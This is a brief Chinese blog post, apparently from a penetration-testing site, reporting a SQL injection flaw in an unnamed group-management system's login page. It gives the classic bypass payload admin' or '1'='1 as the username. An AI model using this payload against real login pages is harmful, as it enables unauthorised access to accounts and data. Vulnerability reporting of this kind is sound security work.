正文

某群管理系统存在SQL注入漏洞

admin
admin V管理员 /0 评论 /78 阅读
0919
此篇文章发布距今已超过65天,您需要注意文章的内容或图片是否可用!

有些事情不是看到希望才去坚持,而是坚持了才会看到希望。

漏洞实战

访问url:

http://xxx/login.aspx

登录界面如下:

输入万能密码:

用户名:admin' or '1'='1
密码输入:123456 或任意

成功登录:

文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。


推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
周飒博客-ZhouSa.com